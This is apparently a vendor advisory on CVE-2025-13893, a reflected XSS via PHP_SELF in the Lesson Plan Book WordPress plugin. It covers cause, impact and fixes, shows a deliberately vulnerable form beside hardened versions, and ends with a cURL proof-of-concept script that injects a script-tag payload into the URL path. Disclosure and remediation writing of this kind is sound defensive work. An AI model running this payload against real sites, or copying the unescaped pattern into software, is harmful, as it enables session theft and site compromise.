Atomic Edge analysis of CVE-2025-13893 (metadata-based):
This vulnerability is a reflected cross-site scripting (XSS) flaw in the Lesson Plan Book WordPress plugin, affecting all versions up to and including 1.3. The vulnerability stems from improper handling of the PHP_SELF server variable, allowing unauthenticated attackers to inject malicious scripts. The CVSS score of 6.1 indicates medium severity, with impacts on confidentiality and integrity but not availability.
Atomic Edge research identifies the root cause as insufficient sanitization and output escaping of the $_SERVER['PHP_SELF'] variable. PHP_SELF holds the path of the executing script plus any trailing path info the client appended to the request, so its value is influenced by the requester even though the server populates it. The plugin likely echoes this variable directly into HTML output without proper escaping. This inference is based on the CWE-79 classification and the vulnerability description. Without source code, we cannot confirm the exact file or line number, but the pattern matches common WordPress plugin vulnerabilities where server variables are trusted implicitly.
Exploitation requires an attacker to craft a malicious URL whose path carries a JavaScript payload that is reflected through PHP_SELF. The attacker must trick a victim into visiting the link. The payload executes in the victim’s browser within the context (and therefore the origin) of the vulnerable plugin page. Atomic Edge analysis suggests the vulnerable endpoint is likely an administrative or front-end page that uses PHP_SELF for form actions or self-referencing links. A typical proof-of-concept payload is alert(document.domain), with a real attack substituting JavaScript that steals session cookies.
Remediation requires proper output escaping of the PHP_SELF value before it is echoed into HTML. WordPress provides esc_url() for URL contexts such as href and action attributes and esc_attr() for other attribute values. The plugin should also validate its inputs, but because PHP_SELF is populated by the server from the request path rather than read from a named parameter, output escaping is the control that actually closes this hole; better still, the plugin can avoid PHP_SELF entirely and build its form action from a known base URL. The fix must ensure all user-controllable data is escaped on output, following WordPress coding standards.
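The following is an added example, not the plugin's code and not part of the Atomic Edge analysis: it reproduces the unescaped PHP_SELF form-action pattern the root-cause and remediation paragraphs describe, and places a hardened rendering beside it that builds the action from a known base URL, escapes on output in the correct context, and protects the handler with a nonce. It assumes WordPress is loaded (esc_url(), esc_attr(), admin_url(), wp_nonce_field(), check_admin_referer(), sanitize_text_field(), wp_unslash() and update_option() are WordPress core functions); the lpb_-prefixed function names, the option name and the page slug are hypothetical.

```php
<?php
// Added example: the flawed pattern described above and a hardened form of it.
// Assumes WordPress is loaded; lpb_* names, the option name and the page slug
// are hypothetical.

// BEFORE: PHP_SELF is the script path plus any trailing path info the client
// sent, so it is request-controlled. Echoing it unescaped into the action
// attribute lets a crafted path close the attribute and inject markup.
function lpb_render_form_vulnerable() {
    echo '<form method="post" action="' . $_SERVER['PHP_SELF'] . '">';
    echo '<input type="text" name="lesson_title">';
    echo '<input type="submit" value="Save">';
    echo '</form>';
}

// AFTER: do not derive the action from the request at all; build it from a
// known-good base with admin_url(), and still escape it with esc_url() at the
// point of output. Any other request-derived value that is rendered goes
// through esc_attr(). A nonce lets the handler reject forged submissions.
function lpb_render_form_hardened() {
    $action = admin_url( 'admin.php?page=lesson-plan-book' );
    $title  = isset( $_GET['lesson_title'] )
        ? sanitize_text_field( wp_unslash( $_GET['lesson_title'] ) )
        : '';

    echo '<form method="post" action="' . esc_url( $action ) . '">';
    wp_nonce_field( 'lpb_save_lesson', 'lpb_nonce' );
    echo '<input type="text" name="lesson_title" value="' . esc_attr( $title ) . '">';
    echo '<input type="submit" value="Save">';
    echo '</form>';
}

// Minimal change if the self-referencing action must stay: esc_url() removes
// characters outside its allowed set, which includes the double quote and
// angle brackets an attribute break-out relies on, so the attribute cannot be
// closed early. Prefer the admin_url() form above.
function lpb_render_form_minimal_fix() {
    echo '<form method="post" action="' . esc_url( $_SERVER['PHP_SELF'] ) . '">';
    echo '<input type="submit" value="Save">';
    echo '</form>';
}

// Handler side: verify the nonce before acting on the submission, then
// sanitize the posted value before storing it.
function lpb_handle_save() {
    check_admin_referer( 'lpb_save_lesson', 'lpb_nonce' );
    $title = sanitize_text_field( wp_unslash( $_POST['lesson_title'] ?? '' ) );
    update_option( 'lpb_last_lesson_title', $title );
}
```

The point of the hardened version is that escaping is applied per output context (esc_url() for the action attribute, esc_attr() for the value attribute) and that the request path never reaches the markup at all; the minimal fix is included only to show what the single-line change the advisory calls for looks like.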
Successful exploitation allows attackers to execute arbitrary JavaScript in the victim’s browser. This can lead to session hijacking, administrative actions performed on behalf of logged-in users, or defacement of the WordPress site. The impact is bounded by the victim’s current session and permissions, so an administrator victim could lead to full site compromise.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-13893 - Lesson Plan Book <= 1.3 - Reflected Cross-Site Scripting
<?php
/**
 * Proof of Concept for CVE-2025-13893
 * This script demonstrates reflected XSS via PHP_SELF in the Lesson Plan Book plugin.
 * Since the exact vulnerable endpoint is unknown from metadata, this PoC targets a common pattern.
 * Assumptions:
 * 1. The plugin has a page that echoes $_SERVER['PHP_SELF'] without escaping.
 * 2. The page is accessible via GET request.
 * 3. The XSS triggers when the crafted URL is visited.
 */
$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/admin.php?page=lesson-plan-book';

// XSS payload to demonstrate vulnerability
$payload = '"><script>alert(document.domain)</script>';

// Construct malicious URL by appending the payload to the path (so it is
// reflected through PHP_SELF), then re-attach the original query string
$parsed = parse_url($target_url);
$path = $parsed['path'] ?? '/';
$path_with_payload = $path . $payload;
$exploit_url = $parsed['scheme'] . '://' . $parsed['host'] . $path_with_payload;
if (isset($parsed['query'])) {
    $exploit_url .= '?' . $parsed['query'];
}

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Atomic Edge PoC');

// Execute request; curl_exec() returns false on a transport error, and
// strpos() must not be fed that false value
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($response === false) {
    echo "[-] Request failed: " . curl_error($ch) . "\n";
    curl_close($ch);
    exit(1);
}
curl_close($ch);

// Check if the raw payload appears in the response (indicating potential XSS)
if (strpos($response, $payload) !== false) {
    echo "[+] Potential XSS vulnerability detected (HTTP $http_code).\n";
    echo "[+] Exploit URL: $exploit_url\n";
    echo "[+] Visit this URL in a browser to trigger the alert.\n";
} else {
    echo "[-] No obvious XSS reflection detected (HTTP $http_code).\n";
    echo "[-] The vulnerable endpoint may differ from assumptions.\n";
}
?>